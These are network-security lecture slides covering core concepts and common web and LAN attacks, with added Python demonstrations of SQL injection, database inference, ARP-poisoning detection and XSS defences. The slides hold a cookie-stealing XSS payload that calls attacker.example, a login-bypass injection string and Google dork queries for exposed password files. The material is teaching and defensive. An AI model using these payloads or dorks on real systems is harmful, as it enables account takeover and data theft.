Information and Network Security

World History
(figure only; no recoverable text)

Information Security: Basic Concepts

Information Protection: Why?
• Information is an important strategic and operational asset for any organization
• Damage to or misuse of information affects not only a single user or application; it may have disastrous consequences for the entire organization
• The advent of the Internet and of networking capabilities has made access to information much easier, for legitimate users and attackers alike

Information Security: Requirements
(figure: the three requirements, Confidentiality, Integrity and Availability, arranged around Information Security)

Information Security: Examples
• Consider a payroll database in a corporation; it must be ensured that:
  – salaries of individual employees are not disclosed to arbitrary users of the database (confidentiality)
  – salaries are modified only by individuals who are properly authorized (integrity)
  – paychecks are printed on time at the end of each pay period (availability)
• In a military environment, it is important that:
  – the target of a missile is not disclosed to an unauthorized user
  – the target is not arbitrarily modified
  – the missile is launched when it is fired

Information Security: Main Requirements
• Confidentiality: protection of information from unauthorized read operations
  – the term privacy is often used when the data to be protected refer to individuals
• Integrity: protection of information from modification; it involves several goals:
  – assuring that the information matches the original information (especially relevant in web environments), often referred to as authenticity
  – protecting information from unauthorized modification
  – protecting information from incorrect modification, referred to as semantic integrity
• Availability: ensuring that access to information is not denied to authorized subjects

Information Security: Additional Requirements
• Information quality: not traditionally considered part of information security, but very relevant
• Completeness: ensuring that subjects receive all the information they are entitled to access according to the stated security policies

Classes of Threats
• Disclosure: snooping, Trojan horses
• Deception: modification, spoofing, repudiation of origin, denial of receipt
• Disruption: modification
• Usurpation: modification, spoofing, delay, denial of service

Goals of Security
• Prevention: prevent attackers from violating the security policy
• Detection: detect attackers' violations of the security policy
• Recovery: stop the attack, assess and repair the damage; continue to function correctly even if the attack succeeds

Information Security: How
• Information must be protected at various levels:
  – the operating system
  – the network
  – the data management system
• Physical protection is also important

Information Security: Mechanisms
• Confidentiality is enforced by the access control mechanism
• Integrity is enforced by the access control mechanism and by semantic integrity constraints
• Availability is enforced by the recovery mechanism and by detection techniques for DoS attacks, an example of which is a query flood

Information Security: Additional Mechanisms
• User authentication: verify the identity of subjects wishing to access the information
• Information authentication: ensure the authenticity of information; supported by signature mechanisms
• Encryption: protect information when it is transmitted across systems and when it is stored on secondary storage
• Intrusion detection: protect against impersonation of legitimate users and against insider threats

Data vs Information
• Computer security is about controlling access to information and resources
• Controlling access to information can be quite elusive, so it is often replaced by the more straightforward goal of controlling access to data
• The distinction between data and information is subtle, but it is also the root of some of the more difficult problems in computer security
• Data represent information; information is the (subjective) interpretation of data
• Data: physical phenomena chosen by convention to represent certain aspects of our conceptual and real world. The meaning we assign to data is called information. Data are used to transmit and store information and to derive new information by manipulating the data according to formal rules
• Protecting information means protecting not only the data that directly represent the information; information must also be protected against disclosure through:
  – covert channels
  – inference, which is typical of database systems and refers to the derivation of sensitive information from non-sensitive data

Inference: Example
Name     Sex  Programme  Units  Grade Ave
Dittin   M    CS         8      63
Smitha   F    MBA        15     58
Manas    M    CS         16     70
Ann      F    CS         22     75
Subhash  M    MIS        8      66
Abhinav  M    CS         10     81

• Assume a policy stating that the average grade of a single student cannot be disclosed, while statistical summaries can be disclosed
• Suppose an attacker knows that Ann is a female CS student
• By combining the results of the following legitimate queries:
  – Q1: SELECT Count(*) FROM Students WHERE Sex = 'F' AND Programme = 'CS'
  – Q2: SELECT Avg(Grade Ave) FROM Students WHERE Sex = 'F' AND Programme = 'CS'
  the attacker learns from Q1 that there is only one female CS student, so the value returned by Q2 (75 in the table above) is precisely Ann's grade average

Information Security: Complete Solution
• It consists of:
  – first defining a security policy
  – then choosing some mechanism to enforce the policy
  – finally providing assurance that both the mechanism and the policy are sound
• This is the security life-cycle

Policies and Mechanisms
• A policy says what is, and is not, allowed; this defines "security" for the information
• Mechanisms enforce policies
• Composition of policies: if policies conflict, the discrepancies may create security vulnerabilities

Assurance
• Specification: requirements analysis; statement of the desired functionality
• Design: how the system will meet the specification
• Implementation: programs and systems that carry out the design

Management and Legal Issues
• Cost-benefit analysis: is it more cost-effective to prevent or to recover?
• Risk analysis: should we protect some information? How much should we protect it?
• Laws and customs: are the desired security measures illegal? Will people adopt them?

Human Factor Issues
• Organizational problems: power and responsibility; financial benefits
• People problems: outsiders and insiders; social engineering

Key Points
• Policies define security, and mechanisms enforce it: confidentiality, integrity, availability
• Importance of assurance
• The human factor

Privacy

Motivations
• Privacy is an important issue today
  – Individuals feel uncomfortable (ownership of information) and unsafe (information can be misused, e.g. identity theft)
  – Enterprises need to keep their customers feeling safe, maintain a good reputation, protect themselves from legal disputes and obey legal regulations

Privacy: Definition
• Privacy is the ability of a person to control the availability of information about, and exposure of, him- or herself. It is related to being able to function in society anonymously (including pseudonymous or blind-credential identification)
• Types of privacy giving rise to special concerns:
  – political privacy
  – consumer privacy
  – medical privacy
  – information technology end-user privacy, also called data privacy
  – private property

Data Privacy
• Data privacy problems exist wherever uniquely identifiable data relating to a person or persons are collected and stored, in digital form or otherwise. Improper or non-existent disclosure control can be the root cause of privacy issues.
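The inference example above (the Students table, Q1 and Q2) can be reproduced end to end. The following is an added example, not code from the slides: it rebuilds the table in an in-memory SQLite database (the data are the slide's constructed sample; the column is named GradeAve here because SQL identifiers with spaces are awkward), runs the attacker's two queries, and then shows the classic defence, a query-set-size control that refuses to release a statistic computed over too few rows (MIN_QUERY_SET is an assumed policy value), together with the differencing attack that shows why that control alone is not enough.

```python
import sqlite3

# Constructed sample data reproducing the Students table from the slide
# (illustrative data only, not a real class register).
STUDENTS = [
    ("Dittin",  "M", "CS",  8,  63),
    ("Smitha",  "F", "MBA", 15, 58),
    ("Manas",   "M", "CS",  16, 70),
    ("Ann",     "F", "CS",  22, 75),
    ("Subhash", "M", "MIS", 8,  66),
    ("Abhinav", "M", "CS",  10, 81),
]

MIN_QUERY_SET = 2  # assumed policy: no aggregate over fewer than 2 rows


def make_db():
    """Create an in-memory database holding the constructed Students table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Students(Name TEXT, Sex TEXT, Programme TEXT,"
                " Units INT, GradeAve REAL)")
    con.executemany("INSERT INTO Students VALUES (?, ?, ?, ?, ?)", STUDENTS)
    return con


def infer_average(con, sex, programme):
    """The attacker's side: Q1 (count) and Q2 (average) over the same
    predicate. The predicate text is a constant; only the values are bound.
    If Q1 reports exactly one row, Q2's 'statistic' is that one person's
    individual grade average."""
    where = "Sex = ? AND Programme = ?"
    (count,) = con.execute(f"SELECT COUNT(*) FROM Students WHERE {where}",
                           (sex, programme)).fetchone()
    (avg,) = con.execute(f"SELECT AVG(GradeAve) FROM Students WHERE {where}",
                         (sex, programme)).fetchone()
    return count, avg  # count == 1 means avg identifies one student


def guarded_average(con, sex, programme, min_rows=MIN_QUERY_SET):
    """Defender's side: query-set-size control. The aggregate is released only
    when the predicate matches at least min_rows rows; otherwise the caller
    gets None (and, in a real system, the refused query should be logged)."""
    count, avg = infer_average(con, sex, programme)
    if count < min_rows:
        return None
    return avg


def differencing_attack(con):
    """Why the size guard alone is not enough: two permitted query sets whose
    difference is exactly one record (all CS students minus the male CS
    students) still reveal Ann's grade average."""
    (sum_cs,) = con.execute(
        "SELECT SUM(GradeAve) FROM Students WHERE Programme = 'CS'").fetchone()
    (sum_male_cs,) = con.execute(
        "SELECT SUM(GradeAve) FROM Students WHERE Programme = 'CS' AND Sex = 'M'"
    ).fetchone()
    return sum_cs - sum_male_cs


if __name__ == "__main__":
    db = make_db()
    print("Q1, Q2 for F/CS:", infer_average(db, "F", "CS"))
    print("guarded F/CS:", guarded_average(db, "F", "CS"))
    print("guarded M/CS:", guarded_average(db, "M", "CS"))
    print("differencing:", differencing_attack(db))
```

Query-set-size restriction is the textbook first step for statistical databases; the differencing function shows that a tracker built from two large, individually permitted query sets defeats it, which is why practical systems add query auditing, result perturbation or k-anonymity (referenced later in the slides) on top of it.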
• The most common sources of data affected by data privacy issues are: health information, criminal justice, financial information, genetic information

Data Privacy (cont.)
• The challenge in data privacy is to share data while protecting personally identifiable information
  – Consider health data collected from the hospitals in a district; it is standard practice to share them only in aggregate form
  – Sharing in aggregate form is meant to ensure that only non-identifiable data are shared (as the inference example above shows, aggregation alone is not sufficient when the query set is small)
• Legal protection of the right to privacy in general, and of data privacy in particular, varies greatly around the world

Technologies with Privacy Concerns
• Biometrics (DNA, fingerprints, iris) and face recognition
• Video surveillance, ubiquitous networks and sensors
• Cellular phones
• Personal robots
• DNA sequences, genomic data

Approaches in Privacy
• Anonymization techniques: investigated in the areas of networks (see the anonymity terminology by Andreas Pfitzmann) and databases (see the notion of k-anonymity by L. Sweeney)
• Privacy-preserving data mining
• P3P policies: tailored to the specification of privacy practices by organizations and of user privacy preferences
• Hippocratic databases: tailored to support privacy policies
• Fine-grained access control techniques
• Private information retrieval techniques

Privacy vs Security
• Privacy is not just confidentiality and integrity of user data
• Privacy includes other requirements: support for user preferences, support for obligation execution, usability, proof of compliance

Access Control
• Exerting control over who can interact with a resource
• Includes authentication, authorization and audit

Access Control Models
• Discretionary Access Control (DAC): the policy is determined by the owner of the object (file and data ownership, access rights and permissions)
• Mandatory Access Control (MAC): the policy is determined by the system; access is decided by comparing the subject's clearance with the object's classification label, and object owners cannot override it
• Role-Based Access Control (RBAC): permissions are assigned to roles, and users obtain them through the roles they are assigned

Network Security

The Problem of Network Security
• The Internet allows an attacker to attack from anywhere in the world, from their home desk
• The attacker needs to find only one vulnerability
• A security analyst needs to close every vulnerability

Common Security Attacks
• Finding a way into the network
• Exploiting software bugs, buffer overflows
• Denial of service
• TCP hijacking
• Packet sniffing
• Social problems, and many more

Hacker Classes
• Black hat: "a person with extraordinary computing skills involved in malicious or destructive activities"
• White hat: "a person possessing hacker skills, using them for defensive purposes", a.k.a. security analyst
• Gray hat: "a person who plays the role of black hat and white hat at various times"
• Suicide hackers: "a person committed to bringing down critical infrastructure without worrying about facing punishment"

The Security Triangle
• Security, functionality and ease of use are the corners of a triangle; moving the ball toward security means moving away from functionality and ease of use

Basic Steps of Hacking
• Reconnaissance
• Scanning
• Gaining access
• Retaining access
• Covering tracks

Reconnaissance
• The phase in which the attacker collects and gathers as much information as possible about the target of evaluation prior to launching an attack
• Types of reconnaissance:
  – Passive reconnaissance acquires information without directly interacting with the target, e.g. searching public records and news
  – Active reconnaissance interacts with the target directly by any means, e.g. telephone or email

Tools for Reconnaissance
• DNS: nslookup, whois, ARIN
• Traceroute: traceroute, VisualRoute trace
• Email: VisualRoute mail tracker, eMailTrackerPro

Scanning
• The pre-attack phase in which the hacker scans the network for specific information, on the basis of the information gathered during reconnaissance
• Scanning includes port scanners, network mapping and vulnerability scanners

Types of Scanning
• Network sweeps
• Network tracing
• Port scans
• OS fingerprinting
• Version scans
• Vulnerability scans

Tools for Scanning
• Nmap
• Hping2
• Firewalk
• Nessus
• Nikto
• Nemesis

Gaining Access
• The penetration phase: the hacker exploits a vulnerability in the target of evaluation
• Access can be gained through buffer overflows, denial of service, session hijacking and password cracking

Tools for Gaining Access
• Password cracking: dictionary and brute-force attacks with John the Ripper; sniffers
• Escalating privilege: cracking NT/2000 passwords
• Executing applications: host or remote key loggers
• Buffer overflows: Metasploit
• DoS attacks: Trinoo, TFN2K
• Social engineering: phishing URLs, email, telephone

Exploit Categories
• Server side
• Client side
• Local privilege escalation

Retaining Access
• The phase in which the hacker tries to retain ownership of the system
• The hacker has compromised the system and may harden it against other hackers as well
• Hackers can upload, download or manipulate data, applications or configurations on the owned system
• Backdoors and Trojans: Netcat, Loki
• Rootkits: Knark, t0rn, etc.

Covering Tracks
• The activities that the hacker undertakes to hide the misdeed
• Reasons include the need for a prolonged stay, continued use of resources, removing evidence of hacking and avoiding legal action
• Tools: steganography (Camouflage, MP3Stego); tunnelling (HTTPTunnel)

Types of Attacks
• Operating system attacks
• Application-level attacks
• Shrink-wrap code attacks
• Misconfiguration attacks

Operating System Attacks
• Today's operating systems are complex in nature
• An operating system runs many services, ports and modes of access, and requires access tweaking to lock it down
• A default installation leaves the OS with a large number of open ports and unwanted services running
• Apply patches, because attackers look for OS vulnerabilities and exploit them to gain access

Application-Level Attacks
• Software developers are under tight schedules to deliver products on time
• Software applications have a large number of functions and features
• There is not enough time to perform complete testing before releasing products
• Security is often an afterthought, usually delivered as an add-on component
• Poor or non-existent error checking in applications leads to buffer overflows

Shrink-Wrap Code Attacks
• When you install an OS, it comes with a large number of sample scripts to make the administrator's life easy
• The problem is not fine-tuning or customizing these scripts; this leads to default-code, or shrink-wrap code, attacks

Misconfiguration Attacks
• Systems that should be fairly secure are hacked because they were not configured correctly
• Systems are complex, and the administrator may not have the necessary skills or resources to fix the problem, so the administrator creates the simplest configuration that works
• Remove unwanted services and software

Vulnerability Research
• To identify and correct network vulnerabilities
• To protect the network from being attacked by intruders
• To get information that helps prevent security problems
• To know how to recover from network attacks

Vulnerability Research Websites
• www.securitytracker.com
• www.microsoft.com/security
• www.securiteam.com
• www.packetstormsecurity.com
• www.hackerstrom.com
• www.hackerwatch.org
• www.securityfocus.com
• www.securitymagazine.com

Penetration Testing
• Determine how susceptible your network is to external or internal attacks and assess the effectiveness of your safeguards
• Attempt to exploit the weaknesses and demonstrate the effectiveness of the security measures

Ground Reality
• CVE vulnerabilities: on average 7 per day
• The Bugtraq mailing list publishes almost 100 vulnerabilities every week
• Security is not a primary consideration while designing software
• Implementations are buggy
• Networks are more open and accessible than ever
• Mistaken assumptions and unawareness about security
• Internet revolution and crackers at large
• Intense cut-throat competition between companies
• The future is fully connected: new technologies rely on networks and computers

All About Attacks
• SQL injection
• URL crawler attacks
• Using whois for performing attacks
• Traceroute to trace routers
• ARP poisoning
• Man in the middle (MITM)
• MAC flooding
• Cookie stealing attacks
• Hacking Gmail and Yahoo mail accounts on a LAN
• Protocol stripping attacks
• Cross-site scripting (XSS)
• Session fixation
• Cross-site request forgery (CSRF)
• TCP session hijacking attack
• Google hacks
• Social engineering attack

What Is SQL Injection?
• SQL injection is a type of security exploit in which the attacker injects SQL through a web form input box, to gain access to resources or to make changes to data
• It is a technique of injecting SQL commands to exploit non-validated input vulnerabilities in a web application's database back end
• Programmers build queries by concatenating user input into the SQL text, making it easy for attackers to inject commands:
  "select * from table where user='$v1' and pass='$v2'"

Exploiting Web Applications
• SQL injection exploits web applications through client-supplied SQL fragments
• It enables attackers to execute unauthorized SQL commands
• It takes advantage of unsafe, dynamically built SQL queries in web applications
• For example, when a user logs onto a web page with a user name and password, a SQL query is used for validation

What You Should Look For
• Look for pages that allow users to submit data: a login page, a search page
• Look for HTML pages that use POST or GET
• Check the HTML source code for information
• If no input page is present, check for pages such as ASP, JSP, CGI or PHP
• Check for URLs that take parameters:
  http://www.xyz.com/index.php?id=0
  http://www.xyz.com/index.asp?id=blah' or 1=1--

URL Crawlers
• Definition: a URL crawler is a computer program that browses the given URL in a methodical, automated manner
• Uses: gather pages and URLs from the given web site; support search engines; data mining, and so on

Whois
• Whois is a query/response protocol widely used for querying databases in order to determine the registrant or assignee of Internet resources, such as a domain name, an IP address block or an autonomous system number (reference: Wikipedia)
• Whois references:
  – ARIN: http://ws.arin.net/whois
  – RIPE NCC: http://www.ripe.net/whois/
  – APNIC: http://whois.apnic.net
  – LACNIC: http://whois.lacnic.net
  – AfriNIC: http://whois.afrinic.net
  – www.whois.org

Traceroute
• Traceroute is a network tool that shows the path taken by packets to reach their destination; it works by using the TTL field of the IP header
• Used for network troubleshooting
• Used for information gathering about the network architecture

ARP Poisoning
• ARP poisoning is a kind of spoofing in which a forged ARP reply is sent in response to (or even without) an ARP request
• The target computer updates its ARP cache with the forged entry
• The victim machine then sends its packets to the attacker, allowing the attacker to sniff them
(figure: ARP poisoning diagram)

Vulnerable and Non-Vulnerable OS
• OSes listed as vulnerable to ARP spoofing: Windows 98/2000, Windows NT, Linux, Netgear, AIX 4.3
• OS listed as not vulnerable to ARP spoofing: Sun Solaris
• Whether a stack accepts unsolicited ARP replies or overwrites existing cache entries depends on the OS version and its configuration

Man in the Middle (MITM)
• Man in the middle is a type of attack in which the attacker forms independent connections with the client and the server and is transparent to each of them
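The SQL injection slides above show the vulnerable query shape ("select * from table where user='$v1' and pass='$v2'") and the payload blah' or 1=1--. The following is an added example, not code from the slides: it runs that exact query against an in-memory SQLite database with a constructed users table, once built by string concatenation and once with bound parameters, so the effect of the payload can be compared. The table contents and the login function names are assumptions made for the demonstration.

```python
import sqlite3

# Constructed users table for the demonstration (illustrative data only).
USERS = [("admin", "s3cret"), ("alice", "wonderland")]


def make_db():
    """Create an in-memory database holding the constructed users table."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users(user TEXT, pass TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return con


def login_vulnerable(con, user, password):
    """The pattern from the slide: user input is concatenated into the SQL
    text, so the quote and comment characters in the input become part of the
    statement. Returns the user names the query matched."""
    sql = f"select * from users where user='{user}' and pass='{password}'"
    # With user = "blah' or 1=1--" the statement the database sees is:
    #   select * from users where user='blah' or 1=1--' and pass='...'
    # The 'or 1=1' is always true and '--' comments out the password check.
    return [row[0] for row in con.execute(sql)]


def login_safe(con, user, password):
    """Same query, but the values are bound as parameters: the database
    parses the statement first and treats the values purely as data, so
    quotes and comment markers in the input cannot change its structure."""
    sql = "select * from users where user=? and pass=?"
    return [row[0] for row in con.execute(sql, (user, password))]


if __name__ == "__main__":
    db = make_db()
    payload = "blah' or 1=1--"
    print("vulnerable:", login_vulnerable(db, payload, "x"))
    print("safe:      ", login_safe(db, payload, "x"))
```

The vulnerable version returns every row (so a login check that tests "did the query return a row" lets the attacker in as the first user, here admin), while the parameterized version returns nothing for the payload and still authenticates a real user with the correct password. Parameterized queries are the fix; input "validation" by stripping quotes is not, because other injection contexts (numeric parameters such as id=0, LIKE patterns, ORDER BY) involve no quotes at all.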
Man in the Middle (MITM): Possible Causes
• ARP poisoning
• DNS poisoning
• Route mangling
• Proxy

Once in the Middle
• It is the easiest attack to launch, since all the packets transit through the attacker
• All the plain-text protocols are compromised (the attacker can sniff the user names and passwords of many widely used protocols such as telnet, FTP and HTTP)
• It is transparent to the victims on either side
• The attacker can present its own certificate to form the "secure" connection (HTTPS); this succeeds when the victim ignores the certificate warning or the attacker's certificate is trusted by the client

Consequences
• The attacker can add packets to an already established connection
• The attacker can modify the sequence numbers and keep the connection synchronized while injecting packets
• If the MITM attack is a "proxy attack", injection is even easier
• The attacker can modify the payload by recalculating the checksum
• The attacker can create filters on the fly

MAC Flooding Attack
• This attack targets switches
• Flood the switch with frames carrying fake source MAC addresses
• The CAM table fills up with fake MAC addresses
• The switch then floods traffic out of all ports
• The switch starts behaving like a hub
(figure: the attacker does the MAC flooding; the switch floods the traffic out)

What Is a Cookie?
• A short piece of text generated during web activity and stored on the user's machine for future reference
• Instructions for reading and writing cookies are coded by web site authors and executed by the user's browser
• Developed for user convenience, to allow customization of sites without the need to repeat preferences
• Used as the identity of the user towards the web server (session cookie)

Cookie Facts
• Most cookies store just one data value
• A cookie may not exceed 4 KB in size
• The original cookie specification required browsers to keep at least 300 cookies in total; beyond that, cookies are deleted automatically based on expiry date and usage
• Cookies have three key attributes: name, value and expiry date; further attributes (domain, path, Secure, HttpOnly) control where the cookie is sent and whether scripts can read it
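The ARP poisoning and MITM slides above describe the attack from the attacker's side; the defender's counterpart is a monitor that watches ARP replies and flags the two signs of poisoning, a reply nobody asked for and a known IP address suddenly mapping to a different MAC (what arpwatch does). The following is an added example, not code from the slides: it parses raw Ethernet/ARP frames with struct, keeps an IP-to-MAC table, and raises alerts. The frames are constructed inline for the demonstration; the addresses and the ArpWatch class name are assumptions.

```python
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))


def ip_bytes(s):
    return bytes(int(x) for x in s.split("."))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b):
    return ".".join(str(x) for x in b)


def build_arp(src_mac, dst_mac, op, sender_mac, sender_ip, target_mac, target_ip):
    """Build an Ethernet II + ARP frame. Used here only to construct sample
    traffic; a poisoning tool emits frames of exactly this shape on the wire."""
    eth = struct.pack("!6s6sH", mac_bytes(dst_mac), mac_bytes(src_mac), ETH_P_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, op,
                      mac_bytes(sender_mac), ip_bytes(sender_ip),
                      mac_bytes(target_mac), ip_bytes(target_ip))
    return eth + arp


def parse_arp(frame):
    """Extract the ARP fields the monitor needs; None for non-ARP frames."""
    if len(frame) < 42:
        return None
    _dst, _src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETH_P_ARP:
        return None
    _, _, _, _, op, smac, sip, _tmac, tip = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    return {"op": op, "sender_mac": mac_str(smac), "sender_ip": ip_str(sip),
            "target_ip": ip_str(tip)}


class ArpWatch:
    """arpwatch-style monitor: learns IP->MAC bindings from replies and alerts
    when a reply arrives without an outstanding request for that IP, or when
    a known IP is rebound to a different MAC (the signature of poisoning)."""

    def __init__(self):
        self.table = {}       # ip -> mac learned so far
        self.pending = set()  # ips for which a request has been seen
        self.alerts = []

    def observe(self, frame):
        pkt = parse_arp(frame)
        if pkt is None:
            return
        if pkt["op"] == ARP_REQUEST:
            self.pending.add(pkt["target_ip"])
            return
        ip, mac = pkt["sender_ip"], pkt["sender_mac"]
        if ip in self.pending:
            self.pending.discard(ip)
        else:
            self.alerts.append(f"unsolicited reply {ip} is-at {mac}")
        old = self.table.get(ip)
        if old is not None and old != mac:
            self.alerts.append(f"{ip} changed {old} -> {mac}")
        self.table[ip] = mac


def demo():
    """Constructed traffic: a legitimate request/reply for the gateway, then a
    forged reply from the attacker claiming the gateway's IP address."""
    gw_ip, gw_mac = "192.168.1.1", "00:11:22:33:44:01"
    victim_ip, victim_mac = "192.168.1.2", "00:11:22:33:44:02"
    attacker_mac = "de:ad:be:ef:00:01"  # assumed attacker address
    w = ArpWatch()
    w.observe(build_arp(victim_mac, "ff:ff:ff:ff:ff:ff", ARP_REQUEST,
                        victim_mac, victim_ip, "00:00:00:00:00:00", gw_ip))
    w.observe(build_arp(gw_mac, victim_mac, ARP_REPLY, gw_mac, gw_ip, victim_mac, victim_ip))
    w.observe(build_arp(attacker_mac, victim_mac, ARP_REPLY, attacker_mac, gw_ip, victim_mac, victim_ip))
    return w


if __name__ == "__main__":
    for a in demo().alerts:
        print("ALERT:", a)
```

Note that after the third frame the monitor's own table holds the attacker's MAC for the gateway, just as the victim's ARP cache would; the monitor does not prevent the poisoning, it only makes it visible. Prevention belongs in the switch (dynamic ARP inspection, DHCP snooping) or in static ARP entries for critical hosts.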
Cookie Algorithm
(flowchart) Start on page load; read the cookie; is the cookie empty? If yes, write a new cookie, prompting for information if necessary; if no, use the cookie information to customize the page, log the user in, etc.; continue loading the page; update the cookie

Cookie Stealing
• Cookies can be stolen by sniffing the traffic
• By using scripts that execute in the client browser and reveal the cookie information to the attacker
• By using the man-in-the-middle technique

Using a Cookie Editor for Hacking
• Cookie Editor is available as a Mozilla (Firefox) add-on
• It helps in viewing cookies
• It helps in updating, deleting and modifying the present cookies

Protocol Stripping Attack
• Why do hackers strip a protocol?
• Can we decrypt SSL encryption? To date no practical mechanism has been devised
• Does this mean the HTTPS protocol is secure? Hackers don't think so
• Can HTTPS be tricked? Definitely yes: the attacker in the middle keeps the victim's side of the connection on plain HTTP while talking HTTPS to the real server

Positive Browsers (screenshot)
Negative Browsers (screenshot)
Gmail Login Page (screenshots, two slides)
Yahoo Login Page (screenshots, two slides)
Facebook Login Page? (screenshots, two slides)

What's Going On Behind?
(figure) Host A, HTTP, Attacker, HTTPS, Host B: the victim (Host A) talks plain HTTP to the attacker, who maintains the HTTPS connection to the real server (Host B)

Cross-Site Scripting Attack (XSS)
• Cross-site scripting occurs when an attacker uses a web application to send malicious code, such as JavaScript, to other users
  – Stored XSS: the injected code is permanently stored in the target server's database
  – Reflected XSS: the injected code takes another route to the victim; the server reflects it back from the request, for example from a parameter in a link the victim is lured into clicking

Consequences of XSS
• Disclosure of the user's session cookie allows an attacker to hijack the user's session and take over the account
• Through XSS, end-user files may be disclosed, Trojan horses installed, the user redirected to another page, and the presentation of the content modified
• Web servers, application servers and web application environments are all susceptible to cross-site scripting
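The XSS and cookie-stealing slides above describe the attack; the following added example (not code from the slides) shows it against a minimal page renderer and the two defences a practitioner applies: output encoding of every untrusted value, and marking the session cookie HttpOnly so that injected script cannot read it. The page layout, the payloads and the cookie name are constructed for the demonstration; a deliberately wrong "fix" (stripping the literal script tag) is included to show why blacklisting fails.

```python
import html

# Constructed payloads: the first is the classic cookie-stealing script, the
# second an event-handler payload that contains no <script> tag at all.
PAYLOAD = "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>"
ONERROR_PAYLOAD = '<img src=x onerror="fetch(\'http://attacker.example/?c=\'+document.cookie)">'


def render_unsafe(query, comments):
    """Vulnerable page: user-controlled strings are pasted straight into HTML.
    `query` models reflected XSS (echoed from the request); `comments` models
    stored XSS (read back from the database)."""
    items = "".join(f"<li>{c}</li>" for c in comments)
    return f"<p>Results for {query}</p><ul>{items}</ul>"


def render_safe(query, comments):
    """Output encoding: every untrusted value is escaped for the HTML text
    context before it is concatenated. html.escape(quote=True) also converts
    ' and ", which covers the quoted-attribute context."""
    items = "".join(f"<li>{html.escape(c, quote=True)}</li>" for c in comments)
    return f"<p>Results for {html.escape(query, quote=True)}</p><ul>{items}</ul>"


def naive_filter(s):
    """A common but wrong fix: remove the literal <script> tag. Payloads
    using event handlers (onerror, onload) survive it untouched."""
    return s.replace("<script>", "").replace("</script>", "")


def contains_active_markup(page):
    """Detection helper: does the rendered page still carry a tag that can
    run script (a <script> tag or an on* event handler on a raw tag)?"""
    low = page.lower()
    return "<script" in low or ("<img" in low and "onerror=" in low)


def session_cookie_header(session_id):
    """Defence in depth for the cookie-stealing consequence: HttpOnly keeps
    document.cookie from exposing the session id to injected script, Secure
    keeps it off plain HTTP, SameSite=Lax limits cross-site sending."""
    return f"Set-Cookie: sid={session_id}; Path=/; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    print(render_unsafe("x", [PAYLOAD]))
    print(render_safe(PAYLOAD, [ONERROR_PAYLOAD]))
    print(render_unsafe("x", [naive_filter(ONERROR_PAYLOAD)]))
    print(session_cookie_header("constructed-session-id"))
```

Escaping is context-dependent: html.escape is right for text and quoted attributes, but a value placed inside a JavaScript block, a URL or a CSS property needs the encoder for that context, and a value placed in an unquoted attribute cannot be made safe by escaping at all. HttpOnly does not stop XSS, it only removes the session cookie from what a successful injection can steal.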
Session Fixation Attack
• In a session fixation attack the attacker fixes the victim's session key even before the victim logs into the server; this eliminates the need to steal the session key and lets the attacker take over the victim's account once the victim has authenticated under that key
• Steps for a session fixation attack:
  – session setup
  – session fixation
  – session entrance
(figure: session fixation diagram)

TCP Session Hijacking
• TCP session hijacking is a hacking technique that uses spoofed packets to take over the connection between a victim and a target machine
• The victim's connection hangs, and the hacker is then able to communicate with the host machine as if the attacker were the victim
• To launch a TCP session hijack the attacker must be on the same network as the victim, in order to observe the sequence numbers in use
(figure: sequence-number exchange) SYN ISN 4000; SYN ISN 5000 / ACK 4001; ACK 5001; SEQ 4000 DATA 128; ACK 4129; SEQ 4129 DATA 91; ACK 4220; SEQ 4220 DATA 10; ACK 4230; SEQ 4230 DATA 512; SEQ 4220 DATA 145 (the last segment reuses an already acknowledged sequence number: the connection has been desynchronized)

Cross-Site Request Forgery (CSRF)
• This attack forces another user's browser to perform an action on the attacker's behalf
• CSRF attacks are effective in a number of situations:
  – the victim has an active session on the target site
  – the victim is authenticated via HTTP auth on the target site
  – if the user is logged in as an administrator on a web site, the attack can be used to escalate privilege

Types of CSRF
• Classical CSRF: in the course of web browsing, the target user encounters a request from a malicious site or location that makes a request on the user's behalf to a site the user is already authenticated to. CSRF seeks to use the victim's cookie to force the victim to execute a transaction without his knowledge or consent
• Dynamic CSRF: the attacker creates a customized, per-request forgery based on each user's session-specific information, including valid CSRF tokens and other parameters specific to the user's session

Google Hacks
• inurl:adminlogin.php
• "login: *" "password= *" filetype:xls
• intitle:"Live View / - AXIS"
• intitle:"index.of.personal"
• intitle:index.of administrators.pwd
• intitle:"index of" intext:connect.inc
• filetype:ini
• Many more Google hacking keywords can be found in the Google Hacking Database (GHDB)

Social Engineering
• The victim is tricked into revealing confidential information
• A non-technical attack
• Still more dangerous and powerful than most complex technical attacks
• Does not require technical skills

Perimeter Security

Firewall
• Software and/or hardware designed to block unauthorized access while permitting authorized communications
• Configured to permit, deny, encrypt or decrypt traffic based on a set of rules and other criteria
• Helps to block all incoming communications from unauthorized sources
(figure: firewall placement)

Firewall Implementation
• Rules at the router
• Linux network-layer firewall, with Linux as the firewall platform: robust kernel-based filtering; a tested platform; performance; cost
• Packet filtering: iptables

IDS
• An Intrusion Detection System is a security system that detects malicious activities on computer systems and networks

Types of IDS
• Host-based IDS: signature-based or anomaly-based
• Network-based IDS: signature-based or anomaly-based

IPS
• Network security appliances that monitor network and/or system activities for malicious activity
• Functions: identify malicious activity; log information; attempt to stop the activity; report the activity
• Network-based intrusion prevention system (NIPS): monitors the entire network for suspicious traffic by analyzing protocol activity
• Network behavior analysis (NBA): examines network traffic to identify threats that generate unusual traffic flows, such as distributed denial of service (DDoS) attacks, certain forms of malware and policy violations
• Host-based intrusion prevention system (HIPS): monitors a single host for suspicious activity by analyzing events occurring within that host
• Detection methods: signature-based detection; statistical anomaly-based detection; stateful protocol analysis detection

VPN
• A VPN is a connection established over an existing "public" or shared infrastructure, using encryption or authentication technologies, to provide remote offices or individual users with secure access to their organization's network
• A means of carrying private traffic over a public network
• Often used to connect two similar or different private networks over a public network, to form a virtual network
• Aims to avoid an expensive system of owned or leased lines that can be used by only one organization
• The goal of a VPN is to provide the organization with the same secure capabilities, but at a much lower cost
